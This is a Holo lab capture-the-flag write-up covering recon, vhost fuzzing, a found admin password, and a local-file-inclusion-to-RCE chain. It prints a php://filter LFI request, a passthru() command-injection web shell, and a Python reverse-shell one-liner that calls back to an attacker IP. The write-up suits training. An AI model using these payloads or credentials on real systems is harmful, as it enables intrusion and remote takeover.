السلام عليكم ورحمة الله وبركاته
رابط المادة: http://iswy.co/e28dqd
رابط المادة: http://iswy.co/e28dqd
رابط المادة: http://iswy.co/e28dqd
اللهم علمنا ما ينفعنا وانفعنا بما علمتنا وزدنا علما
Intro
In this lab, you will learn and explore the following topics:
- .NET basics
- Web application exploitation
- AV evasion
- Whitelist and container escapes
- Pivoting
- Operating with a C2 (Command and Control) Framework
- Post-Exploitation
- Situational Awareness
- Active Directory attacks
You will learn and exploit the following attacks and misconfigurations:
- Misconfigured subdomains
- Local file Inclusion
- Remote code execution
- Docker containers
- SUID binaries
- Password resets
- Client-side filters
- AppLocker
- Vulnerable DLLs
- Net-NTLMv2 / SMB
-
Scope
IP OS 10.200.112.30 Windows 10.200.112.33 Linux 10.200.112.250 Linux
------------------------------------------------------------------------------------------------------------------
-
Dot NET
.NET uses a run-time environment known as the **Common Language Runtime (CLR)** ----- .NET uses a run-time environment known as the **Common Language Runtime (CLR)** .NET Framework (Windows only) .NET Core (Cross-Compatible) ----- .NET compiled to -> **exe** , dllVisual Studio is not the only C# compiler, and there are several other compilers outlined below.
- Roslyn
- GCC
- MinGW
- LLVM
- TCC
- MSBuild
To begin using Visual Studio, you will need a valid Microsoft/Outlook account to sign in and authenticate to Visual Studio. It is a simple and free process to create an account if you do not already have one. For more information, check out the Outlook page, https://outlook.live.com/owa/.
We will begin our compiling journey by creating and building a solution file from the code we wrote in the previous task.
To create a solution file for .NET Core, navigate to create a new project > Console App (.NET Core). If you want to open a preexisting solution file/project, navigate to Open a project or solution.
From here, you can configure your project's Name, Location, and Solution Name. Find a screenshot of the configuration menu below.
Once created, Visual Studio will automatically add a starting C# hello world file and maintain the solution file for building. Find a screenshot of the file structure below.
You will notice that Visual Studio will break down the Dependencies, Classes, and Methods in this file tree, which can be helpful when debugging or analyzing code.
From here, we should have a working, automatically generated C# hello world file that we can use to test our build process. To build a solution file, navigate to Build > Build Solution or hold Ctrl+Shift+B. You can also build from applications themselves rather than project solutions; however, that is out of scope for this network. Once run, the console tab should open or begin outputting information. From here, you can monitor the build process and any errors that may occur. If successful, it will output Build: 1 succeeded and the path to the compiled file. Find a screenshot of the build process below.
You should now have a successfully compiled file that you can run and use on other systems with corresponding .NET versions!
It is important to note that when building other developer's tools, they will often contain several dependencies and packages. Ensure the machine you are using to build the solution has access to the internet to retrieve the needed packages.
-
Dot NET Linux
yay -S dotnet-runtime dotnet-sdk dotnet-host dotnet new console -o holo code . then ctrl+shift+p
dotnet run code
cyber Kill Chain
Reconnaissance
Let’s Start with Nmap -sCV -p- -vv -T4 --open -oN nmap $IP/24
│ PORT STATE SERVICE REASON VERSION
8 │ 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
9 │ | ssh-hostkey:
10 │ | 3072 f7:85:b5:ac:29:88:75:32:33:bf:e8:d7:14:44:c7:c9 (RSA)
11 │ | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDELnNtSdD8SdmaZGZxNrjbgmB1oIEKweZFySsmiNIAyrbsgq6RZltZJU+hzUCJhAi5zq
│ IctYlCK5aO2dFm8pBwKK2KdF2k6QhDBFOUD9Y7DUR5IbKjddsnVuAmkaKb3syZdNUW8FnuMFN5HjoChooRgzZTJ26jfclq/YaQVEzwLGTTlg
│ boiUYywDN6fiZ42ch223marzg3s8CNrqeSJpIz0S+tTuMsXlCtiWeYkRSzf9i1HukAN7LfDepMI/2+kGSTvPJhSA/7JoRu8cMSjhf/G6Jon9
│ vbdasyyx4C05GkAf+WO0+QMXEi985qO7RP7pZDT8Mj80AkdHRc8DlnBzuRDO6pWc8i5fjmsArArOXv1wDbQDgyMkEGPuXD/e7r1+03M2OvJQ
│ 7f7cqs8q0awaz4jviinvEjng1GQ5eXm0cFzzwPDY5qeIFeVfYCrhxHxtdP5FWJFyNa87YAWaxVLmXXDMSrjQG7XyVWB9cgPD0lnOjYeuESyY
│ g7Vr8XfkRFVPs=
12 │ | 256 28:ec:98:a6:5d:8b:6f:86:01:cc:70:b1:41:29:3f:02 (ECDSA)
13 │ | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEEn6RPPd2+kQw7Pp1fbQAqWJdkq5EHDfj
│ aJTXe1uQjUrl+c0NS5+NyAoUHESvv27G6JxieiDGczJqZm6ZC2mfo=
14 │ | 256 9c:26:c4:87:f0:6f:62:85:e1:3f:99:80:16:b9:b3:8c (ED25519)
15 │ |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDy0yWuB1wlRmhp2RvunGIw+/FoyPg6TOmT820bSAiIu
16 │ 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
17 │ |_http-server-header: Apache/2.4.29 (Ubuntu)
18 │ |_http-title: holo.live
19 │ |_http-generator: WordPress 5.5.3
20 │ | http-robots.txt: 21 disallowed entries
21 │ | /var/www/wordpress/index.php
22 │ | /var/www/wordpress/readme.html /var/www/wordpress/wp-activate.php
23 │ | /var/www/wordpress/wp-blog-header.php /var/www/wordpress/wp-config.php
24 │ | /var/www/wordpress/wp-content /var/www/wordpress/wp-includes
25 │ | /var/www/wordpress/wp-load.php /var/www/wordpress/wp-mail.php
26 │ | /var/www/wordpress/wp-signup.php /var/www/wordpress/xmlrpc.php
27 │ | /var/www/wordpress/license.txt /var/www/wordpress/upgrade
28 │ | /var/www/wordpress/wp-admin /var/www/wordpress/wp-comments-post.php
29 │ | /var/www/wordpress/wp-config-sample.php /var/www/wordpress/wp-cron.php
30 │ | /var/www/wordpress/wp-links-opml.php /var/www/wordpress/wp-login.php
31 │ |_/var/www/wordpress/wp-settings.php /var/www/wordpress/wp-trackback.php
32 │ | http-methods:
33 │ |_ Supported Methods: GET HEAD POST OPTIONS
34 │ 33060/tcp open mysqlx? syn-ack
35 │ | fingerprint-strings:
36 │ | DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
37 │ | Invalid message"
38 │ |_ HY000
39 │ 1 service unrecognized despite returning data. If you know the service/version, please submit the following
│ fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
40 │ SF-Port33060-TCP:V=7.92%I=7%D=8/18%Time=62FE461F%P=x86_64-pc-linux-gnu%r(N
41 │ SF:ULL,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(GenericLines,9,"\\x05\\0\\0\\0\\x0b\\
42 │ SF:x08\\x05\\x1a\\0")%r(GetRequest,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(HTTPOp
43 │ SF:tions,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(RTSPRequest,9,"\\x05\\0\\0\\0\\x0b
44 │ SF:\\x08\\x05\\x1a\\0")%r(RPCCheck,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(DNSVers
45 │ SF:ionBindReqTCP,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(DNSStatusRequestTCP,2
46 │ SF:B,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88'\\x1a\\x0fI
47 │ SF:nvalid\\x20message\\"\\x05HY000")%r(Help,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")
48 │ SF:%r(SSLSessionReq,2B,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01
49 │ SF:\\x10\\x88'\\x1a\\x0fInvalid\\x20message\\"\\x05HY000")%r(TerminalServerCookie
50 │ SF:,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(TLSSessionReq,2B,"\\x05\\0\\0\\0\\x0b\\x
51 │ SF:08\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88'\\x1a\\x0fInvalid\\x20message\\"
52 │ SF:\\x05HY000")%r(Kerberos,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(SMBProgNeg,9
53 │ SF:,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(X11Probe,2B,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\
54 │ SF:x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88'\\x1a\\x0fInvalid\\x20message\\"\\x05HY0
55 │ SF:00")%r(FourOhFourRequest,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(LPDString,
56 │ SF:9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(LDAPSearchReq,2B,"\\x05\\0\\0\\0\\x0b\\x0
57 │
SF:8\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88'\\x1a\\x0fInvalid\\x20message\\"\\
58 │ SF:x05HY000")%r(LDAPBindReq,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(SIPOptions
59 │ SF:,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(LANDesk-RC,9,"\\x05\\0\\0\\0\\x0b\\x08\\x
60 │ SF:05\\x1a\\0")%r(TerminalServer,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(NCP,9,"
61 │ SF:\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(NotesRPC,2B,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1
62 │ SF:a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88'\\x1a\\x0fInvalid\\x20message\\"\\x05HY000
63 │ SF:")%r(JavaRMI,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(WMSRequest,9,"\\x05\\0\\0
64 │ SF:\\0\\x0b\\x08\\x05\\x1a\\0")%r(oracle-tns,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r
65 │ SF:(ms-sql-s,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0")%r(afp,2B,"\\x05\\0\\0\\0\\x0b\\x0
66 │ SF:8\\x05\\x1a\\0\\x1e\\0\\0\\0\\x01\\x08\\x01\\x10\\x88'\\x1a\\x0fInvalid\\x20message\\"\\
67 │ SF:x05HY000")%r(giop,9,"\\x05\\0\\0\\0\\x0b\\x08\\x05\\x1a\\0");
68 │ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
69 │
70 │ Nmap scan report for 10.200.112.250 (10.200.112.250)
71 │ Host is up, received conn-refused (0.18s latency).
72 │ Scanned at 2022-08-18 15:54:52 EET for 405s
73 │ 38;2;248;248;242mNot shown: 58046 closed tcp ports (conn-refused), 7487 filtered tcp ports (no-response)
74 │ Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
75 │ PORT STATE SERVICE REASON VERSION
76 │ 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
77 │ | ssh-hostkey:
78 │ | 2048 0f:6f:f4:97:a2:f1:7a:6a:9c:44:fe:e0:09:05:dd:c6 (RSA)
79 │ | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4nPKdx1rIKz5Jp4sKTYzqwru9jTcrEkn294qk9PTeQxWX8WzeP2Tb0X4JOQnA9RvoAz
│ WrjXyGiT61lr8hEtiaI59B3V/DmGR5rfVVK0pqhMuy1MZiUVZztHoGAedKaWXhdoey5I6nB/kqoi6rs5JDG9jONAuMIdkzRPxT26UZncBLgD
│ bGmvf6jEVK6S69GAnhSv5vzbDdnKXcSjS3/pkRHDaDDsaFPOhy5S4nlc5nJyUNjuS24WU0RVI5xAgaXn9tzXXixAcGaaR/zBWLHclES1zlV2
│ 8SpvAFASZwhsLYcyLSulg25ylce86ZZA7VCC7My0b8nzjlp+aF49iDmzYB
80 │ | 256 59:bd:f8:47:fc:1e:3a:2f:98:fd:84:5f:11:84:f1:84 (ECDSA)
81 │ | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCZHdjvGZzbqryme0rQrNBvozUddaNPiMa
│ WW3DPII5Wg9RbGe+5BkvO3zj+YdyvgTAu3FdVUj7rou/sN1WVHovs=
82 │ | 256 f4:cc:6c:f2:ca:dc:fa:74:68:eb:25:b7:f6:ac:09:de (ED25519)
83 │ |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPNaVUVAXaWlep3lha3tW0wtxdr7YUb0Ni/AwvoKWMnY
84 │ 1337/tcp open http syn-ack Node.js Express framework
85 │ | http-methods:
86 │ |_ Supported Methods: GET HEAD POST OPTIONS
87 │ |_http-title: Error
88 │ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
89 │
90 │ Read data files from: /usr/bin/../share/nmap
91 │ Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
92 │ # Nmap done at Thu Aug 18 16:01:37 2022 -- 256 IP addresses (2 hosts up) scanned in 426.52 seconds
Machine : "L-SRV01"
start with the Port 80 :
we need to add holo.live in our /etc/hosts → This file acts as a local DNS service for your local machine, and it overrides the mappings from the DNS server to which your machine is connected over the network
now let's run whatweb to identify the website CMS and technology
or you could use we Wappalyzer 
now let's discover vhosts with Gobuster or ffuf
gobuster vhost -u <http://www.holo.live/> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
ffuf -u <http://holo.live/> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host:FUZZ.holo.live" -fs 21456 ## vhost
we Found admin and dev now add them to your /etc/hosts
After that, let's perform directory Bruteforcing on admin.holo.live and dev.holo.live
admin.holo.live
take a look on robots.txt
we found spicy files, if you navigate to any one of them we got HTTP 403 Forbidden
dev.holo.live
to find the where images store, you just move your mouse on any picture and look down left the page
Set up the test environment → For exploitation
apt install apache2 php (debian based )- yay -S httpd php (ARCH)
# edit configuration files to use port 8080
systemctl start apache2 (debian based ) - systemctl start httpd (ARCH)
wget <https://github.com/Sq00ky/holo-bash-portscanner/raw/main/holo-playground.zip> -O /var/www/holo.zip && unzip /var/www/holo.zip
Exploitation
Local File Inclusion (LFI) - is an attack technique in which attackers trick a web application into either running or exposing files on a web server
I know you forget things, so I'm leaving this note for you: admin:DBManagerLogin! - gurag <3
now we can try to access admin.holo.live with this credential 
and we are in 
Local File Inclusion (LFI) to Remote Code Execution (RCE)
METHOD - 1
curl "http://dev.holo.live/img.php?file=php://filter/convert.base64-encode/resource=/var/www/admin/dashboard.php" | base64 -d and search for cmd you will find
<?php if ($_GET['cmd'] === NULL) { echo passthru("cat /tmp/Views.txt"); } else { echo passthru($_GET['cmd']);}?> Visitors today</h4> we could see passthru() function → passthru() function is similar to the exec() function in that it executes a command
now we can use ?cmd=$arg → http://admin.holo.live/dashboard.php?cmd=id
Method - 2
[<http://admin.holo.live/dashboard.php?cmd=>](<http://admin.holo.live/dashboard.php?cmd=which%20python3>)python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.50.109.169",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
vulnerability summary
| Vulnerability | Impact | Migration |
|---|---|---|
| Local File Inclusion (LFI) | High | Use Whitelisting , do not use filenames from user input |
| Remote Code Execution (RCE) | High | When allowing user-supplied data to be passed to this function, use escapeshellarg() orescapeshellcmd Instead of Passthru or exec to ensure that users cannot trick the system into executing arbitrary commands. |
To be continued
Related Posts
